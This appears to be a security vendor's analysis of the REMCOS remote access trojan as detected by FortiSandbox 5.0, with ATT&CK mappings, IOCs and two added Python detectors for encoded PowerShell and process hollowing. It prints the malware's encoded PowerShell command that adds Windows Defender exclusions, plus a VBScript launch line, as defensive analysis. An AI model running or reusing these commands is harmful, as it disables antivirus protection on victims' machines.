Summary
In the ever-evolving landscape of cybersecurity, the ability to detect and analyze sophisticated malware behaviors becomes more critical than ever. FortiSandbox 5.0 (FSAv5) has significantly enhanced its capabilities with the integration of the PAIX engine and specialized hooks for .NET programs. These advancements empower security professionals to dissect malware with greater accuracy and to uncover behaviors that might otherwise remain concealed.
A recent demonstration of this capability involved the detection of REMCOS, a remote access trojan that enables attackers to gain unauthorized control over compromised systems. REMCOS can steal sensitive information, log keystrokes, and capture screenshots. This malware is often distributed through phishing emails or malicious downloads, employing obfuscation techniques to evade detection and maintain persistence on infected machines.
FortiSandbox plays a crucial role in identifying such threats by executing malware in a controlled environment that simulates real-world user interactions. This approach not only facilitates detailed behavioral analysis but also ensures that insights gained from these detections are shared across Fortinet’s Security Fabric. This article explores the mechanisms FSAv5 uses to identify and understand sophisticated malware threats like REMCOS, highlighting its contribution to modern cybersecurity defense strategies.
Analysis in FSAv5
The purpose of this article is to introduce the newly released FSAv5 and showcase its enhanced capabilities in detecting, analyzing, and documenting advanced malware. FSAv5 includes two key new features: the PAIX engine and improved detection for .NET programs.
The PAIX engine enables sophisticated static malware detection, allowing deeper insight into malicious code operations. Additionally, the enhanced .NET program analysis provides greater visibility into the behavior of this increasingly common malware vector. These advancements are demonstrated through an in-depth analysis of the REMCOS remote access trojan (RAT), known for its extensive data theft capabilities.
Visual aids, including an updated Tree View diagram (Figure 1), illustrate REMCOS’ full execution sequence. This chronological breakdown outlines the malware’s tactics and processes in detail, clearly highlighting how FSAv5’s new features identify and analyze complex, modern threats. By exploring REMCOS, this article aims to give readers an understanding of FSAv5’s role in defending against sophisticated malware.
Figure 1. Chain of execution provided by FSAv5
Additionally, suspicious indicators triggered during the analysis were recorded and categorized (Figure 2). This documentation provides further context and aids in identifying potentially malicious activities. With the enhancements in FSAv5, these indicators not only document the observed behaviors but also correlate them with specific MITRE ATT&CK techniques. This correlation provides a deeper understanding of the tactics employed by the malware.
Figure 2. FSAv5 updated indicators page
The newly integrated PAIX engine in FSAv5 performs static analysis, enabling it to detect the malware without executing the code. By analyzing the malware’s code structure, embedded signatures and other static properties, the PAIX engine can identify potential threats efficiently. Figure 3 shows an example of PAIX engine detection, illustrating how FSAv5 identifies malicious elements within the REMCOS sample through static analysis.
Figure 3. PAIX engine detection
In addition to the PAIX engine, FSAv5 introduces a new capability for analyzing .NET programs, a significant enhancement given the increasing prevalence of .NET-based malware. By tracing the invocation of .NET APIs, FSAv5 can provide insight into the specific operations and actions undertaken by the malware. This feature captures a wide range of API calls, revealing how the malware interacts with the system, manipulates data and executes malicious actions. Figure 4 demonstrates the .NET analysis in action for the REMCOS malware.
Figure 4. .NET APIs
When executed, REMCOS begins by dropping a copy of itself into the %APPDATA% folder under the name “ApplicationTrustManager.exe” to avoid detection. After establishing itself in this directory, it executes a base64-encoded string using PowerShell. The encoded command is as follows:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAHcAbwByAGsAXAA3ADQAMAAxADYAMwA1ADQANwA0ADIAMwA0ADEAOAAxADgAMwA0AC4AZQB4AGUAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABDADoAXAB3AG8AcgBrAFwANwA0ADAAMQA2ADMANQA0ADcANAAyADMANAAxADgAMQA4ADMANAAuAGUAeABlADsAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAEEAcABwAGwAaQBjAGEAdABpAG8AbgBUAHIAdQBzAHQATQBhAG4AYQBnAGUAcgAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAGkAcwB0AHIAYQB0AG8AcgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAQQBwAHAAbABpAGMAYQB0AGkAbwBuAFQAcgB1AHMAdABNAGEAbgBhAGcAZQByAC4AZQB4AGUA
Once decoded, the command uses the Add-MpPreference cmdlet to add both the file path and process of ApplicationTrustManager.exe to Windows Defender’s exclusion list, which appears as follows:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Add-MpPreference -ExclusionPath REMCOS.exe; Add-MpPreference -ExclusionProcess REMCOS.exe; Add-MpPreference -ExclusionPath %AppData%\Roaming\ApplicationTrustManager.exe; Add-MpPreference -ExclusionProcess %AppData%\Roaming\ApplicationTrustManager.exe
By doing so, REMCOS effectively removes itself from real-time scanning and antivirus protections provided by Windows Defender, ensuring it can operate undetected and unhindered by the system’s security defenses.
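A defender-side check for the step just described, added here as an example and not part of the original article or of FortiSandbox: it decodes the UTF-16LE base64 that PowerShell's -enc switch expects and flags any Add-MpPreference exclusions in the result. The sample command line is constructed for the example and uses a placeholder user path; the parameter names are those of the real cmdlet.

```python
import base64
import re

# Matches powershell's -e / -ec / -enc / -EncodedCommand switch and its base64 argument.
ENCODED_SWITCH = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Matches Add-MpPreference calls that add a Defender exclusion (real parameter names of the cmdlet).
EXCLUSION_CALL = re.compile(
    r"Add-MpPreference\s+-Exclusion(Path|Process|Extension|IpAddress)\s+(\S+)", re.IGNORECASE)

def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries an -enc argument, else None.
    PowerShell expects base64 over the UTF-16LE bytes of the script."""
    m = ENCODED_SWITCH.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def find_defender_exclusions(script):
    """List (kind, target) pairs for every exclusion the script adds."""
    return [(kind.lower(), target.rstrip(";")) for kind, target in EXCLUSION_CALL.findall(script)]

def analyze_command_line(cmdline):
    """Decode an encoded PowerShell command line and report any Defender exclusions it adds."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "script": None, "exclusions": []}
    return {"encoded": True, "script": script, "exclusions": find_defender_exclusions(script)}

def encode_command(script):
    """Build an -enc argument the way PowerShell consumes it (used only to construct the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample modelled on the article's command: exclusions for the dropped copy.
DROPPED_COPY = r"C:\Users\victim\AppData\Roaming\ApplicationTrustManager.exe"   # placeholder path
SAMPLE_SCRIPT = (f"Add-MpPreference -ExclusionPath {DROPPED_COPY}; "
                 f"Add-MpPreference -ExclusionProcess {DROPPED_COPY}")
SAMPLE_CMDLINE = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc '
                  + encode_command(SAMPLE_SCRIPT))

if __name__ == "__main__":
    report = analyze_command_line(SAMPLE_CMDLINE)
    print("decoded:", report["script"])
    for kind, target in report["exclusions"]:
        print(f"ALERT: Defender exclusion ({kind}) added for {target}")
```

In production the same two functions can run over process-creation events (for example Sysmon Event ID 1 command lines) to surface exclusion tampering regardless of how the script was encoded.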
Next, the malware runs a script named ApplicationTrustManager.vbs, which contains the following command to execute the REMCOS payload:
CreateObject("WScript.Shell").Run %AppData%\Roaming\ApplicationTrustManager.exe
This VBScript uses the WScript.Shell object to execute ApplicationTrustManager.exe from the %APPDATA%\Roaming directory. REMCOS injects its malicious payload into a legitimate .NET process; in the observed sample, it targeted the InstallUtil.exe process. After successfully bypassing the previously mentioned security measures, REMCOS spawns the targeted .NET process in a suspended state and then replaces its memory content with its own code using a technique known as process hollowing. This method conceals the malware’s presence, making it harder for traditional security tools to detect and remove. By embedding itself within a trusted process, REMCOS can operate under the radar while continuing its malicious activities. Figure 5 captures and logs this behavior as detected by FortiSandbox.
Figure 5. Targeted process for code injection
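The sequence described above (child created suspended, memory overwritten by the parent, thread resumed) is what a sandbox or EDR can key on. The following detector is an added example, not FortiSandbox's own logic; the event stream and pids are constructed, and the event tuple format is an assumption of this example.

```python
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit passed to CreateProcess

# Constructed sample of API events as (caller_pid, api, target_pid, details).
# Modelled on the behaviour above: InstallUtil.exe started suspended, overwritten, resumed.
SAMPLE_EVENTS = [
    (1200, "CreateProcess", 1300,
     {"image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe",
      "flags": CREATE_SUSPENDED}),
    (1200, "WriteProcessMemory", 1300, {"size": 0x2A000}),
    (1200, "SetThreadContext", 1300, {}),
    (1200, "ResumeThread", 1300, {}),
    # Benign control: a normally started child that only receives a small write.
    (1200, "CreateProcess", 1301, {"image": r"C:\Windows\System32\notepad.exe", "flags": 0}),
    (1200, "WriteProcessMemory", 1301, {"size": 0x100}),
]

def detect_hollowing(events):
    """Flag children created suspended, then written to and resumed.
    Returns one finding per child; 'set_context' records whether the entry point was redirected."""
    stages = defaultdict(set)   # target pid -> stages observed so far
    images = {}
    findings = []
    for caller, api, target, details in events:
        if api == "CreateProcess" and details.get("flags", 0) & CREATE_SUSPENDED:
            stages[target].add("suspended")
            images[target] = details.get("image", "")
            continue
        if "suspended" not in stages.get(target, ()):
            continue   # never started suspended: not a hollowing candidate
        if api in ("WriteProcessMemory", "NtMapViewOfSection"):
            stages[target].add("written")
        elif api == "SetThreadContext":
            stages[target].add("context")
        elif api == "ResumeThread" and "written" in stages[target]:
            findings.append({"caller": caller, "child": target, "image": images[target],
                             "set_context": "context" in stages[target]})
    return findings

if __name__ == "__main__":
    for f in detect_hollowing(SAMPLE_EVENTS):
        print(f"ALERT: possible process hollowing of {f['image']} (pid {f['child']}) "
              f"by pid {f['caller']}")
```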
Upon gaining access to the victim’s machine, REMCOS executes a range of malicious activities, including keylogging, credential theft, remote surveillance and data exfiltration. It specifically targets popular web browsers like Opera, Firefox, and Chrome, aiming to intercept sensitive data such as login credentials, browsing history, and session cookies. Figure 6 and Figure 7 demonstrate examples of REMCOS’ credential theft and keylogging capabilities, respectively. Through these methods, REMCOS enables account compromise and intelligence gathering.
Figure 6. Credential theft capabilities
Figure 7. Keylogging capabilities
As illustrated in Figure 8, during the final attack phase, REMCOS establishes a connection to its command-and-control (C2) server using the identified URL. This communication channel enables threat actors to maintain persistent access to the compromised system, facilitating remote command execution and continuous data exfiltration.
Figure 8. Command-and-Control server
Conclusion
FortiSandbox serves as a crucial component in fortifying organizations against cyber threats by swiftly identifying and mitigating potential breaches. Through its seamless integration with Security Fabric platform products, FortiSandbox protects via inline scanning and enhances collaborative threat intelligence sharing, enabling rapid response to emerging threats.
MITRE ATT&CK
Note: The indicators listed under Observed Activity for each MITRE technique reflect the analyzed campaign and may change in future campaigns.
TA0002 – Execution

| Technique ID | Technique Description | Observed Activity |
|---|---|---|
| T1059.003 | A process with a suspicious extension was used through ApplicationTrustManager.vbs | The script includes code that executes ApplicationTrustManager.exe using WScript |

TA0005 – Defense Evasion

| Technique ID | Technique Description | Observed Activity |
|---|---|---|
| T1562.001 | A setting for Windows Defender was modified | The file modified Windows Defender to exclude specified files from the real-time scans and antivirus protection provided by Windows Defender. |
| T1027.010 | Base64-encoded PowerShell code was executed | REMCOS uses base64 encoding to obfuscate the strings used to run a PowerShell command |
| T1055.012 | The file %SYSTEM%\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe was created in suspended mode | REMCOS injects its payload into the legitimate .NET process InstallUtil.exe to evade detection |
| T1036.005 | A suspicious file ApplicationTrustManager.exe was installed in the %AppData% folder | The malware drops a copy of itself into the %AppData% folder and gives the dropped file the name of a legitimate program. |
| T1564.003 | No visible window was observed | When REMCOS executes, it uses a hidden window to conceal malicious activities from the user. |

TA0011 – Command and Control

| Technique ID | Technique Description | Observed Activity |
|---|---|---|
| T1571 | A connection to a remote server with a non-standard port was attempted | Command-and-control server for REMCOS RAT, http://inforaservice[.]africa |
IOC

| Indicator Description | Indicator | Indicator Type | Associated Tactic | Notes | First Observed |
|---|---|---|---|---|---|
| Original file | 2dc2bbe21165e0ca5cdfc929e8f482b4 | MD5 hash | Installation | Malicious PE file | 2024-11-05 |
| Original file | ef7a86dcd2a4a94572cab689dacb848b8c12b9d56d941208ee390448ff6c4b10 | SHA256 hash | Installation | Malicious PE file | 2024-11-05 |
| Dropped file | 2dc2bbe21165e0ca5cdfc929e8f482b4 | MD5 hash | Installation | Copy of the original file, placed in the %AppData% folder | 2024-11-05 |
| Dropped file | ef7a86dcd2a4a94572cab689dacb848b8c12b9d56d941208ee390448ff6c4b10 | SHA256 hash | Installation | Copy of the original file, placed in the %AppData% folder | 2024-11-05 |
| Malicious websites | http://inforaservice[.]africa | URL | Remote server | REMCOS Command-and-Control (C2) server | 2024-11-05 |
Additional Resources
Further Reading on REMCOS Malware Analysis
- New Campaign Uses REMCOS RAT to Exploit Victims | FortiGuard Labs – This article by the FortiGuard team provides insights into detection techniques, command-and-control behaviors, and methods used by attackers. It complements the analysis presented here by discussing specific infection vectors, payload delivery tactics, and mitigation strategies.